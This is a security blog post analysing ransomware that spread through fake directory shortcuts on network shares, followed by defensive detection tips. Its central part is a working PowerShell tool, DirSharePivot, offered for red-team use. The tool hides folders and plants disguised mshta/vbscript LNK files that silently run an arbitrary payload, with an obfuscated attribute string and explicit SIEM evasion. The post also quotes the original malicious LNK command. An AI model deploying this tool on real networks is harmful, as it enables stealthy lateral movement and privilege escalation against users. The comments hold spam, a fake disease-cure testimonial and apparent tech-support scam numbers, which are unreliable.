Abusing network shares for efficient lateral movements and privesc (DirSharePivot)



Background

About a year ago my team and I had were called to perform a forensic analysis on a customer network. The reason for this was that a computer was first infected by a ransomware, and for some (unknown) reasons, several other workstations were getting "infected" after only 3 hours.
After 5 hours (time of my intervention) I discovered that:
- 80% of the workstations were infected
- The network was partially segmented but the infection occurs on all segments
- A malware process was even running on the file Server as... "Domain Administrator" :-/
- No track of 4624 (Logon Type 3) events or any other track of lateral movements/authentications
Interesting... hum :)

In this article I will describe my analysis of the threat and also how to take advantage of this method in a "safer" and more "controlled" way to  move laterally (or even perform privesc) in red team operations. (practical exploitation code will be provided).
This method may be particularly useful in segmented/restricted networks and could be used to circumvent SIEM detections based on network flows & Windows authentication events only use cases.
I will also suggest some blue team possibilities to catch this kind of attacks.
Nice read :)

Lateral movement abusing user interactions

After finding the "patient 0", I finally see something weird on the main network shares:
Partial screenshot of network share with "supposed" directories links
This looks interesting... I asked some employees and they told me that these links were legits and that when they click on them they access the normal contents without issue... (furthermore DFS can provide share looking as LNK/Shortcuts).
But I decided to analyze this...


A "dir -Force" output in the network share will return the following result, showing the very interesting way to hide the threat:
- Original directories are set to "Hidden" (-h-), 
- from there a LNK is created with the original directory name

dir -Force in the current share

LNK File analysis
An analysis of one of the .LNK confirmed that:
- a malicious payload is embedded
- The LNK use a "Directory" icon (Shell32.dll, Icon index: 3)

Malicious payload:
.\Windows\system32\cmd.exe /c start explorer.exe "Intel" & type "3b5a5b29263677d600.exe" > "%temp%\3b5a5b29263677d600.exe" &&
"%temp%\3b5a5b29263677d600.exe"      


What does it means ?
When a user clicks on any "fake directory":
- An explorer window is opened to access the "real" (hidden) directory making the use think everything is legit thanks to explorer.exe "Intel"
- The malware is copied on the victim user (in %temp%)
- The malware is finally executed locally !
- Once activated, the malware tries to infect all other accessible shares from this new victim
- At the end we have a "continuously" improved lateral movement over the whole network thanks to users actions (network share access) !

In few minutes/hours all the network may become infected depending on the volume of access in the network share.

Benefits for attacker
This lateral movement technique is:
- Particularly efficient (a whole domain may be compromised in few hours)
- Privilege escalation possible ! Indeed, everyone is using network shares in a company, so you are likely to get more and more accounts and privileges, in this current case, even a logged Domain Admin have used the network share and compromised its account !
- Network segmentation is not a problem for attackers as the spreading point is a network share
- Likely not detected by IDS/SIEM as it doesn't trigger any authentication attempts or network scanning from a unique host

Using this technique in Red Team operations
As shown previously this technique may be of great interests when standards privesc/lateral movements failed (high level of patch, strong segmentation etc) during red teams engagements.
For this usage it would be very dangerous to pOwn users which will infect all their own accessible shares etc... (cleaning that at the end of the engagement may be a pain :D)
In this context I have developped the following powershell code to limit this effect only for a specific directory.
Furthermore, the original method was noisy and not optimized:
- "cmd /c" was noisy as it was generating a quick window console...
- writing payload to disk (we are in 2017 :) )
To get rid of this I have used mshta command line running cmd (it is not mandatory as everything could be done using VBscript) with "vbhide" option to hide any possible window, detections will be also limited with in memory payload (no payload written on disk).


function DirSharePivot 
{
 <#
 .SYNOPSIS
 Function: DirSharePivot
 Author: David ROUTIN - 13 nov 2017
  
 Example:
 DirSharePivot -StartDir K:\test -Payload "powershell -enc XXXXXXXXXXXXXXXXXXXXXXXX"

 This will set all the directories in the defined Path as Hidden (non recursive to keep control), after that a LNK file containing your payload will be created with the
 name of each hidden directories.
 This LNK will have a "directory shortcut icon", and will open a explorer to the selected directory when the user will click on it, and execute your defined payload

 #>
 [CmdletBinding()] Param(
        
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $StartDir,

 [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Payload
 
 )
 $Filepath = Get-ChildItem -path $StartDir -Force -directory  
 foreach ( $Object in $Filepath ) {   
      $Object.Attributes = (-join "uRtHoirdebn"[3,5,7,7,8,10])
       
 $Shell = New-Object -ComObject ("WScript.Shell")
 $ShortCut = $Shell.CreateShortcut($StartDir + "\" + $Object + ".lnk")
 $ShortCut.TargetPath="mshta.exe"
 $ShortCut.Arguments= 'vbscript:Close(Execute("Set x = CreateObject(""WScript.shell""): x.Run ""cmd /c explorer.exe ' + $StartDir + "\" + $Object + " & " + $Payload + '"",vbhide "))'
 $ShortCut.WindowStyle = 1;
 $ShortCut.Hotkey = "CTRL+SHIFT+F";
 $ShortCut.IconLocation = "C:\windows\System32\shell32.dll, 3";
 $ShortCut.Description = $Object;
 $ShortCut.Save()
 }
}


Blue team actions

Even not perfect, several tactics may be deployed to detect/protect this spreading method.

- Audit process tracking and create use cases based on sensitives MS signed binaries usage (mshta, powershell, rundll32...)
- Monitor actively powershell executions
- Properly control write permissions on main directories on your share
- Use Applocker to limit the risk of unecessary usage of MS signed binaries.
- Activate "Audit Object Access" and monitor sensitive shares or part of them (as enabling this on a high volume corporate share may have negative performances impacts) to detect specific .LNK.
For example you have a "Honeypot" directory, you may track creation of "Honeypot.lnk" (event 4656)
- Create SIEM rule to monitor multiple .LNK file creations on shares (monitoring events 5145 may be an option at the fileserver level)

David Routin

Commentaires

  1. Happiness is all i see now I never thought that I will be cured from HERPES virus again. I have been suffering from a deadly disease (HERPES) for the past 3 years now, I had spent a lot of money going from one places to another, from churches to churches, hospitals have been my home every day residence. Constant checks up have been my hobby not until this faithful day, I was searching through the internet, I saw a testimony on how Dr Ogudugu helped someone in curing his HERPES disease, quickly I copied his email which is greatogudugu@gmail.com just to give him a test I spoke to him, he asked me to do some certain things which I did, he told me that he is going to provide the herbal cure to me, which he did, then he asked me to go for medical checkup after some days after using the herbal cure, behold I was free from the deadly disease, he only asked me to post the testimony through the whole world, faithfully am doing it now, please brothers and sisters, he is great, I owe him in return. If you are having a similar problem just email him on ( greatogudugu@gmail.com ) or you can whatsApp his mobile number on +27663492930

    RépondreSupprimer
  2. Are you graduated and didn't have the right job according to you? Join ABC Mobile Institute of Technology. The Best Mobile Training Course in Delhi managed by the professionals. We are one of the best training institutes of Mobile, CCTV, Laptop & LED LCD TV Repairing Institute in India. Contact us at 9990879879

    RépondreSupprimer
  3. Call us 9990879879, Come on and learn a course that you can earn from 40000 to 50000 per month. Now Get a New life in Mobile/LED Repairing with ABC Mobile Repairing Courses, Learn Mobile Repairing Course available in 3-4 months and 100% Job Guaranty/Life time back up support. ABCMRS is the best way to get the complete information aboutMobile Repairing Institute in Delhi.

    RépondreSupprimer
  4. The way you posting is too good..Best deal for Projector on Rent in Delhi the projector display the best quality of images and the video. really much informative. that is a modern technique. for more 9811623325
    Laptop on Rent in Delhi NCR
    Projector on Rent in Delhi

    RépondreSupprimer
  5. SBCglobal special issues are simple and with the help of SBCglobal's highly productive technical support, it can help quickly address any problems. You can find a SBCglobal customer service number for any detailed help with extra or extraction. The number that is known for its support in the time is also helpful in sending e-mails and receiving related support. It is actually managed with highly qualified and well-trained technical support specialists.

    RépondreSupprimer
  6. Trusted Packers and Movers in Mehdipatnam, Ashoka Packers and Movers satisfy the customers prerequisite and make each migration solid and helpful with their fitting moving arrangement. We comprehend the customers contemplations and convert it dependably with the problem free movement. We deal with every one of the products and give the best help our system group for best movement.

    Contact Us: 9000809809

    Get more details to visit us:

    Top 10 Packers and Movers in Bandlaguda
    Packers and Movers in Dilsukhnagar
    Best Packers Movers in Nizampet

    RépondreSupprimer
  7. Sanjayprecision Industries is a Manufacturer and Exporter of Precision Turned and Grinded Components according to client prerequisite in a wide range of metals. They outfitted with most recent techno adroit hardware and scholarly technocrats. Sanjay Precision is adjusted to convey accuracy turned Components in various geometries and shifted metals with 30 years of experience.

    To know more visit here:-Sanjay Precision
    Sanjay Precision India

    RépondreSupprimer
  8. aol contact number 1-800-684-5649

    Contact us at 1-800-684-5649 for technical help for Aol mail with our best expertise team 24X7.
    Get instant help on Aol technical issues online.

    https://aolnumbersupport.com/aol-contact-number/

    RépondreSupprimer

Enregistrer un commentaire

Posts les plus consultés de ce blog

CVE-2017-0199 Practical exploitation ! (PoC)